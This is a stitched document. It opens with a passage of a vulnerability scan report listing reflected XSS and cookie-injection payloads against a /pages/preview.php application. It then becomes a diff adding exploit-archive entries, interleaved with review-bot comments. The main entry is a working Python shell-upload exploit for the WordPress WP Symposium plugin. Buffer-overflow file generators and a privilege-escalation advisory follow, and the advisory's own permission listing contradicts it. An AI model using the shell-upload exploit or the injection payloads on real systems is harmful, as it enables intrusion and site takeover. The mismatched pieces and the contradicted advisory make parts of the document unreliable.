+ The following resources may be vulnerable to crosssite scripting+
|
||||
The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=504%20onerror="alert(504);
|
||||
output
|
||||
(extended patterns) :
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||||
a>
|
||||
|
||||
/pages/preview.php?sort=&sort=504%20onerror="alert(504);
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||||
a>
|
||||
|
||||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?order_by=504%20onerror="alert(504);
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||||
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
|
||||
ew</a>
|
||||
|
||||
/pages/preview.php?order_by=&order_by=504%20onerror="alert(504);
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||||
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
|
||||
ew</a>
|
||||
|
||||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=504%20onerror="alert(504);&search=&order_by=&fro
|
||||
m=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||||
a>
|
||||
|
||||
/pages/preview.php?sort=&sort=504%20onerror="alert(504);&search=&order_b
|
||||
y=&from=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||||
a>
|
||||
|
||||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=&search=&order_by=504%20onerror="alert(504);&fro
|
||||
m=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||||
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
|
||||
Tonbridge & Malling Borough Council
|
||||
Vulnerabilities Report | 5
|
||||
a>
|
||||
|
||||
/pages/preview.php?sort=&search=&order_by=&order_by=504%20onerror="alert
|
||||
(504);&from=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||||
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
|
||||
a>
|
||||
|
||||
Clicking directly on these URLs should exhibit the issue :
|
||||
(you will probably need to read the HTML source)
|
||||
/pages/preview.php?sort=504%20onerror="alert(504);
|
||||
/pages/preview.php?order_by=504%20onerror="alert(504);
|
||||
References
|
||||
CWE: 116
|
||||
CWE: 20
|
||||
CWE: 442
|
||||
CWE: 692
|
||||
CWE: 712
|
||||
CWE: 722
|
||||
CWE: 725
|
||||
CWE: 74
|
||||
CWE: 751
|
||||
CWE: 79
|
||||
CWE: 80
|
||||
CWE: 801
|
||||
CWE: 81
|
||||
CWE: 811
|
||||
CWE: 83
|
||||
CWE: 86
|
||||
|
||||
–----------------------------------------------------------------------------------------------------
|
||||
|
||||
Vulnerability: 49067
|
||||
Name: CGI Generic HTML Injections (quick test)
|
||||
Type: CGI abuses : XSS
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 5.0
|
||||
|
||||
Description
|
||||
The remote web server hosts CGI scripts that fail to adequately sanitize
|
||||
request strings with malicious JavaScript. By leveraging this issue,
|
||||
an attacker may be able to cause arbitrary HTML to be executed
|
||||
inuser's browser within the security context of the affected site.
|
||||
The remote web server may be vulnerable to IFRAME injections or
|
||||
crosssite scripting attacks :
|
||||
IFRAME injections allow 'virtual defacement' that
|
||||
might scare or anger gullible users. Such injections
|
||||
are sometimes implemented for 'phishing' attacks.
|
||||
XSS are extensively tested by four other scripts.
|
||||
Some applications (e.g. web forums) authorize a subset
|
||||
of HTML without any ill effect. In this case, ignore
|
||||
this warning.
|
||||
|
||||
Solution
|
||||
Either restrict access to the vulnerable application or contact the
|
||||
vendor for an update.
|
||||
|
||||
Information
|
||||
Using the GET HTTP method, Nessus found that :
|
||||
+ The following resources may be vulnerable to HTML injection :
|
||||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=<"jfunqd%20>
|
||||
output
|
||||
a
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<"jfunqd >&archive=&k=">< Back to resource view</a>
|
||||
|
||||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?order_by=<"jfunqd%20>
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
|
||||
nqd >&sort=DESC&archive=&k=">< Back to resource view</a>
|
||||
|
||||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=<"jfunqd%20>&search=&order_by=&from=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<"jfunqd >&archive=&k=">< Back to resource view</a>
|
||||
|
||||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=&search=&order_by=<"jfunqd%20>&from=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
|
||||
nqd >&sort=&archive=&k=">< Back to resource view</a>
|
||||
|
||||
Clicking directly on these URLs should exhibit the issue :
|
||||
(you will probably need to read the HTML source)
|
||||
/pages/preview.php?sort=<"jfunqd%20>
|
||||
/pages/preview.php?order_by=<"jfunqd%20>
|
||||
|
||||
References
|
||||
CWE: 80
|
||||
CWE: 86
|
||||
|
||||
–---------------------------------------------------------------------------------------------------
|
||||
Vulnerability: SC1628
|
||||
Name: SSL cookie without secure flag set
|
||||
Type: Web Servers
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 12 Nov 2014
|
||||
Service: tcp/https:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
|
||||
|
||||
Resolution Effort: 1
|
||||
Description
|
||||
If the secure flag is not set, then the cookie will be transmitted in
|
||||
cleartext if the user visits any non SSL
|
||||
(HTTP) URLs within the cookie's scope.
|
||||
Solution
|
||||
The secure flag should be set on all cookies that are used for
|
||||
transmitting sensitive data when accessing
|
||||
content over HTTPS.
|
||||
If cookies are used to transmit session tokens, then areas of the
|
||||
application that are accessed over HTTPS
|
||||
should employ their own session handling mechanism, and the session
|
||||
tokens used should never be
|
||||
transmitted over unencrypted communications.
|
||||
Information
|
||||
|
||||
URI: /pages/help.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:11 GMT
|
||||
URI: /pages/search.php
|
||||
Other Info: display=thumbs; httponly
|
||||
URI: /pages/themes.php
|
||||
Other Info: saved_themes_order_by=name; httponly
|
||||
URI: /pages/user_password.php
|
||||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:53:08 GMT; httponly
|
||||
URI: /pages/user_password.php
|
||||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:54:30 GMT; httponly
|
||||
URI: /pages/user_request.php
|
||||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:53:07 GMT; httponly
|
||||
URI: /pages/user_request.php
|
||||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:54:25 GMT; httponly
|
||||
|
||||
–-------------------------------------------------------------------------------
|
||||
|
||||
Vulnerability: 44136
|
||||
Name: CGI Generic Cookie Injection Scripting
|
||||
Type: CGI abuses
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 5.0
|
||||
|
||||
Description
|
||||
The remote web server hosts at least one CGI script that fails to
|
||||
adequately sanitize request strings with malicious JavaScript.
|
||||
By leveraging this issue, an attacker may be able to inject arbitrary
|
||||
cookies. Depending on the structure of the web application, it may be
|
||||
possible to launch a 'session fixation' attack using this mechanism.
|
||||
Please note that :
|
||||
Nessus did not check if the session fixation attack is
|
||||
feasible.
|
||||
This is not the only vector of session fixation.
|
||||
|
||||
Solution
|
||||
Restrict access to the vulnerable application. Contact the vendor
|
||||
for a patch or upgrade.
|
||||
|
||||
Information
|
||||
Using the GET HTTP method, Nessus found that :
|
||||
+ The following resources may be vulnerable to cookie manipulation :
|
||||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=<script>document.cookie="testshay=5812;"</script
|
||||
>
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
|
||||
p;Back to resource view</a>
|
||||
|
||||
/pages/preview.php?sort=&sort=<script>document.cookie="testshay=5812;"</
|
||||
script>
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
|
||||
p;Back to resource view</a>
|
||||
|
||||
References
|
||||
CWE: 472
|
||||
CWE: 642
|
||||
CWE: 715
|
||||
CWE: 722
|
||||
|
||||
–--------------------------------------------------------------------------------------------
|
||||
|
||||
Vulnerability: 39466
|
||||
Name: CGI Generic XSS (quick test)
|
||||
Type: CGI abuses : XSS
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 5.0
|
||||
|
||||
Description
|
||||
The remote web server hosts CGI scripts that fail to adequately sanitize
|
||||
request strings with malicious JavaScript. By leveraging this issue,
|
||||
an attacker may be able to cause arbitrary HTML and script code
|
||||
to be executed in a user's browser within the security context of the
|
||||
affected site.
|
||||
These XSS are likely to be 'non persistent' or 'reflected'.
|
||||
Solution
|
||||
Restrict access to the vulnerable application. Contact the vendor
|
||||
for a patch or upgrade.
|
||||
|
||||
Information
|
||||
Using the GET HTTP method, Nessus found that :
|
||||
+ The following resources may be vulnerable to crosssite scripting
|
||||
(quick+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?order_by=<IMG%20SRC="javascript:alert(104);">
|
||||
output
|
||||
test) :
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=<IMG
|
||||
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
|
||||
esource view</a>
|
||||
|
||||
/pages/preview.php?order_by=&order_by=<IMG%20SRC="javascript:alert(104);
|
||||
">
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=<IMG
|
||||
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
|
||||
esource view</a>
|
||||
|
||||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=<IMG%20SRC="javascript:alert(104);">
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
|
||||
rce view</a>
|
||||
|
||||
/pages/preview.php?sort=&sort=<IMG%20SRC="javascript:alert(104);">
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
|
||||
rce view</a>
|
||||
|
||||
|
||||
References
|
||||
CWE: 116
|
||||
CWE: 20
|
||||
CWE: 442
|
||||
CWE: 692
|
||||
CWE: 712
|
||||
CWE: 722
|
||||
CWE: 725
|
||||
CWE: 74
|
||||
CWE: 751
|
||||
CWE: 79
|
||||
CWE: 80
|
||||
CWE: 801
|
||||
CWE: 81
|
||||
CWE: 811
|
||||
CWE: 83
|
||||
CWE: 86
|
||||
|
||||
–--------------------------------------------------------------------------------------------------------------
|
||||
|
||||
Also issues to be aware of:
|
||||
|
||||
Vulnerability: SC1629
|
||||
Name: Cookie without HttpOnly flag set
|
||||
Type: Web Servers
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 12 Nov 2014
|
||||
Service: tcp/https:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
|
||||
Resolution Effort: 1
|
||||
Description
|
||||
When the HttpOnly attribute is set on a cookie, then the cookies
|
||||
value cannot be read or set by clientside
|
||||
JavaScript.
|
||||
HttpOnly prevent certain clientside attacks, such as Cross Site
|
||||
Scripting (XSS), from capturing the cookies
|
||||
value via an injected script. When HttpOnly is set, script access to
|
||||
document.cookie results in a blank string
|
||||
being returned.
|
||||
Solution
|
||||
HttpOnly can safely be set for all Cookie values, unless the
|
||||
application has a specific need for Script access
|
||||
to cookie contents (which is highly unusual).
|
||||
Please note also that HttpOnly does not mitigate against all dangers
|
||||
of Cross Site Scripting any XSS
|
||||
vulnerabilities identified must still be fixed.
|
||||
Information
|
||||
URI: /pages/help.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:11 GMT
|
||||
|
||||
–-------------------------------------------------------------------------------
|
||||
|
||||
Vulnerability: SC1629
|
||||
Name: Cookie without HttpOnly flag set
|
||||
Type: Web Servers
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 12 Nov 2014
|
||||
Service: tcp/http:80
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
|
||||
Resolution Effort: 1
|
||||
|
||||
Description
|
||||
When the HttpOnly attribute is set on a cookie, then the cookies
|
||||
value cannot be read or set by clientside JavaScript.
|
||||
HttpOnly prevent certain clientside attacks, such as Cross Site
|
||||
Scripting (XSS), from capturing the cookies value via an injected
|
||||
script. When HttpOnly is set, script access to document.cookie results
|
||||
in a blank string being returned.
|
||||
|
||||
Solution
|
||||
HttpOnly can safely be set for all Cookie values, unless the
|
||||
application has a specific need for Script access
|
||||
to cookie contents (which is highly unusual).
|
||||
Please note also that HttpOnly does not mitigate against all dangers
|
||||
of Cross Site Scripting any XSS vulnerabilities identified must
|
||||
still be fixed.
|
||||
|
||||
Information
|
||||
URI: /pages/collection_share.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:42 GMT
|
||||
URI: /pages/contactsheet_settings.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:38 GMT
|
||||
URI: /pages/help.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:05 GMT
|
||||
URI: /pages/preview.php
|
||||
Other Info: thumbs=hide; expires=Tue, 08Aug2017 01:57:55 GMT
|
||||
URI: /pages/resource_email.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:57:42 GMT
|
||||
URI: /pages/view.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:57:45 GMT
|
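--- a/platforms/php/webapps/35543.txt
+++ b/platforms/php/webapps/35543.txt
@@ -0,0 +1,210 @@
+#!/usr/bin/python
+#
+# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
+#
+#
+# Vulnerability discovered by Claudio Viviani
+#
+# Exploit written by Claudio Viviani
+#
+#
+# 2014-11-27: Discovered vulnerability
+# 2014-12-01: Vendor Notification (Twitter)
+# 2014-12-02: Vendor Notification (Web Site)
+# 2014-12-04: Vendor Notification (E-mail)
+# 2014-12-11: No Response/Feedback
+# 2014-12-11: Published
+#
+# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
+#
+# --------------------------------------------------------------------
+#
+# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
+#
+# if ($_FILES["file"]["error"] > 0) {
+# echo "Error: " . $_FILES["file"]["error"] . "<br>";
+# } else {
+# $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
+# //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
+# $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
+# //echo "Extension: " . $ext . "<br />";
+# if (strpos($allowedExts, $ext)) {
+# $extAllowed = true;
+# } else {
+# $extAllowed = false;
+# }
+# //echo "Type: " . $_FILES["file"]["type"] . "<br>";
+# //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
+# //echo "Stored in: " . $_FILES["file"]["tmp_name"];
+#
+# if (!$extAllowed) {
+# echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
+# } else {
+# // Copy file to tmp location
+# ...
+# ...
+# ...
+#
+# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
+#
+# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
+#
+# ---------------------------------------------------------------------
+#
+# Dork google: index of "wp-symposium"
+#
+#
+# Tested on BackBox 3.x with python 2.6
+#
+# Http connection
+import urllib, urllib2, socket
+#
+import sys
+# String manipulator
+import string, random
+# Args management
+import optparse
+# File management
+import os, os.path, mimetypes
+
+# Check url
+def checkurl(url):
+    if url[:8] != "https://" and url[:7] != "http://":
+        print('[X] You must insert http:// or https:// procotol')
+        sys.exit(1)
+    else:
+        return url
+
+# Check if file exists and has readable
+def checkfile(file):
+    if not os.path.isfile(file) and not os.access(file, os.R_OK):
+        print '[X] '+file+' file is missing or not readable'
+        sys.exit(1)
+    else:
+        return file
+# Get file's mimetype
+def get_content_type(filename):
+    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+
+def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
+    return ''.join(random.choice(chars) for _ in range(size))
+
+# Create multipart header
+def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
+
+    getfields = dict()
+    getfields['uploader_uid'] = '1'
+    getfields['uploader_dir'] = './'+randDirName
+    getfields['uploader_url'] = url_symposium_upload
+
+    payloadcontent = open(payloadname).read()
+
+    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
+    CRLF = '\r\n'
+
+    L = []
+    for (key, value) in getfields.items():
+        L.append('--' + LIMIT)
+        L.append('Content-Disposition: form-data; name="%s"' % key)
+        L.append('')
+        L.append(value)
+
+    L.append('--' + LIMIT)
+    L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
+    L.append('Content-Type: %s' % get_content_type(payloadname))
+    L.append('')
+    L.append(payloadcontent)
+    L.append('--' + LIMIT + '--')
+    L.append('')
+    body = CRLF.join(L)
+    return body
+
+banner = """
+___ ___ __
+| Y .-----.----.--| .-----.----.-----.-----.-----.
+|. | | _ | _| _ | _ | _| -__|__ --|__ --|
+|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
+|: | |__|
+|::.|:. |
+`--- ---'
+___ ___ _______ _______ __
+| Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------.
+|. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | |
+|. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
+|: |: | |: 1 |_____| |__|
+|::.|:. |::.| |::.. . |
+`--- ---`---' `-------'
+Wp-Symposium
+Sh311 Upl04d Vuln3r4b1l1ty
+v14.11
+
+Written by:
+
+Claudio Viviani
+
+http://www.homelab.it
+
+info@homelab.it
+homelabit@protonmail.ch
+
+https://www.facebook.com/homelabit
+https://twitter.com/homelabit
+https://plus.google.com/+HomelabIt1/
+https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
+commandList.add_option('-t', '--target', action="store",
+    help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+    )
+commandList.add_option('-f', '--file', action="store",
+    help="Insert file name, ex: shell.php",
+    )
+commandList.add_option('--timeout', action="store", default=10, type="int",
+    help="[Timeout Value] - Default 10",
+    )
+
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target or not options.file:
+    print(banner)
+    commandList.print_help()
+    sys.exit(1)
+
+payloadname = checkfile(options.file)
+host = checkurl(options.target)
+timeout = options.timeout
+
+print(banner)
+
+socket.setdefaulttimeout(timeout)
+
+url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
+
+content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
+
+randDirName = id_generator()
+randShellName = id_generator()
+
+bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
+
+headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
+    'content-type': content_type,
+    'content-length': str(len(bodyupload)) }
+
+try:
+    req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
+    response = urllib2.urlopen(req)
+    read = response.read()
+
+    if "error" in read or read == "0" or read == "":
+        print("[X] Upload Failed :(")
+    else:
+        print("[!] Shell Uploaded")
+        print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
+
+except urllib2.HTTPError as e:
+    print("[X] "+str(e))
+except urllib2.URLError as e:
+    print("[X] Connection Error: "+str(e))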
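Review bot: `checkfile` joins its two conditions with `and`, so a file that exists but is not readable passes the guard and the later `open(payloadname).read()` in `create_body_sh3ll_upl04d` fails with an uncaught IOError; the check should read `if not os.path.isfile(file) or not os.access(file, os.R_OK):`. The same function uses the Python 2 print statement while every other message in the file uses `print(...)`; `print('[X] '+file+' file is missing or not readable')` keeps the file consistent. `create_body_sh3ll_upl04d` also reads `url_symposium_upload`, a module global that is only assigned further down at top level, and it never closes the handle returned by `open(payloadname)`; a comment such as `# depends on url_symposium_upload being assigned at module level before the call` and a `with open(payloadname) as fh:` block would make both explicit.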
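--- a/platforms/windows/local/35530.py
+++ b/platforms/windows/local/35530.py
@@ -0,0 +1,24 @@
+# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)
+# Date: 11/29/2010
+# Author: Hadji Samir s-dz@hotmail.fr
+# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
+# Version: 0.8.33 build 5680
+
+EAX 0012E508
+ECX 43434343
+EDX 00000000
+EBX 43434343
+ESP 0012E4A4
+EBP 0012E4F4
+ESI 0012E508
+EDI 00000000
+
+#!/usr/bin/python
+buffer = ("http://" + "A" * 845)
+nseh = ("B" * 4)
+seh = ("C" * 4)
+junk = ("D" * 60)
+
+f= open("exploit.m3u",'w')
+f.write(buffer + nseh + seh + junk)
+f.close()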
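Review bot: The register dump (`EAX 0012E508` through `EDI 00000000`) sits between the header comments and `#!/usr/bin/python` as bare text, so the file is not valid Python and fails with a SyntaxError before anything is written; each of those lines needs a leading `# `, or the dump belongs in a triple-quoted string, and the shebang should be the first line of the file. 35531.py and 35532.py in this commit have the same layout problem. The `# Date: 11/29/2010` header also looks inconsistent with the 2014 build referenced in the title and software link, presumably a typo worth confirming. The `f= open(...)` / `f.close()` pair would be tidier as `with open("exploit.m3u", 'w') as f:` so the handle is released on any error.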
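--- a/platforms/windows/local/35531.py
+++ b/platforms/windows/local/35531.py
@@ -0,0 +1,25 @@
+# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)
+# Date: 11/29/2010
+# Author: Hadji Samir s-dz@hotmail.fr
+# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
+# Version: 0.8.33 build 5680
+
+EAX 0012E788
+ECX 43434343
+EDX 00000000
+EBX 43434343
+ESP 0012E724
+EBP 0012E774
+ESI 0012E788
+EDI 00000000
+
+#!/usr/bin/python
+
+buffer = ("http://" + "A" * 845)
+nseh = ("B" * 4)
+seh = ("C" * 4)
+junk = ("D" * 60)
+
+f= open("exploit.lst",'w')
+f.write(buffer + nseh + seh + junk)
+f.close()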
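--- a/platforms/windows/local/35532.py
+++ b/platforms/windows/local/35532.py
@@ -0,0 +1,47 @@
+# jaangle 0.98i.977 Denial of Service Vulnerability
+# Author: hadji samir , s-dz@hotmail.fr
+# Download : http://www.jaangle.com/downloading?block
+# Tested : Windows 7 (fr)
+# DATE : 2012-12-13
+#
+
+###################################################################
+
+
+EAX 000000C0
+ECX 00000000
+EDX 00000000
+EBX 00000003
+ESP 01C5FE28
+EBP 01C5FF88
+ESI 00000002
+EDI 002B4A98
+EIP 776964F4 ntdll.KiFastSystemCallRet
+C 0 ES 0023 32bit 0(FFFFFFFF)
+P 1 CS 001B 32bit 0(FFFFFFFF)
+A 0 SS 0023 32bit 0(FFFFFFFF)
+Z 0 DS 0023 32bit 0(FFFFFFFF)
+S 0 FS 003B 32bit 7FFDC000(8000)
+T 0 GS 0000 NULL
+D 0
+O 0 LastErr ERROR_SUCCESS (00000000)
+EFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)
+ST0 empty g
+ST1 empty g
+ST2 empty g
+ST3 empty g
+ST4 empty g
+ST5 empty g
+ST6 empty g
+ST7 empty g
+3 2 1 0 E S P U O Z D I
+FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
+FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
+
+#!/usr/bin/python
+
+buff = ("\x41" * 30000 )
+
+f = open("exploit.m3u",'w')
+f.write( buff )
+f.close()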
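--- a/platforms/windows/local/35534.txt
+++ b/platforms/windows/local/35534.txt
@@ -0,0 +1,38 @@
+# Exploit Title: HTCSyncManager 3.1.33.0 (HSMServiceEntry.exe) Service Trusted Path Privilege Escalation
+# Date: 12/12/2014
+#Author: Hadji Samir s-dz@hotmail.fr
+#Product web page: http://www.htc.com/fr/software/htc-sync-manager/
+#Affected version: 3.1.33.0
+#Tested on: Windows 7 (FR)
+
+
+HTC Synchronisation manager for devices HTC
+
+Vulnerability Details
+There are weak permissions for 'HTCSyncManager'default installation where everyone is allowed to change
+the HSMServiceEntry.exe with an executable of their choice. When the service restarts or the system reboots
+the attacker payload will execute on the system with SYSTEM privileges.
+
+
+C:\Users\samir>sc qc HTCMonitorService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: HTCMonitorService
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : HTCMonitorService
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+
+
+
+C:\Users\samir>icacls "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
+C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe AUTORITE NT\Système:(I)(F)
+BUILTIN\Administrateurs:(I)(F)
+BUILTIN\Utilisateurs:(I)(RX)
+
+1 fichiers correctement traités ; échec du traitement de 0 fichiers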
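Review bot: The evidence in 35534.txt does not support the stated vulnerability: the `icacls` listing grants BUILTIN\Utilisateurs only `(I)(RX)` on HSMServiceEntry.exe, with `(F)` reserved for SYSTEM and Administrators, so the claim that everyone can replace the binary is contradicted by the advisory's own output, and the quoted `BINARY_PATH_NAME` also rules out the unquoted "Trusted Path" class named in the title. 35537.txt has the same problem: the Avira path is quoted and Users again hold only `(RX)`. For either entry to stand it needs a listing that shows a write-capable grant (`(W)`, `(M)` or `(F)`) for a non-administrative principal on the binary or its containing directory; as published, the output documents a correctly hardened service. If no such grant exists, the entries should be withdrawn rather than retitled.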
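--- a/platforms/windows/local/35537.txt
+++ b/platforms/windows/local/35537.txt
@@ -0,0 +1,37 @@
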